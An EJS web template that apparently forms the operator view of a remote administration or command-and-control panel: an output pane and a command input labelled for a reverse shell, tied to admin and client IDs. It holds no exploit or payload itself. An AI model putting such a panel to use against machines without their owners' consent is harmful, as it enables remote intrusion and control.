
<% include ../menu_client %>

<div class="row">
  <pre class="col-sm-12 remoteShell"></pre>
  <input type="text" name="" value="" class="form-control cmdForReverseShell" data-admin-id="<%= admin.admin_id %>" data-client-id="<%= client.client_id %>" placeholder="Enter command here and press enter :)" style="background:#000;color:#2ecc71;border:1px solid #3498db;">
</div>
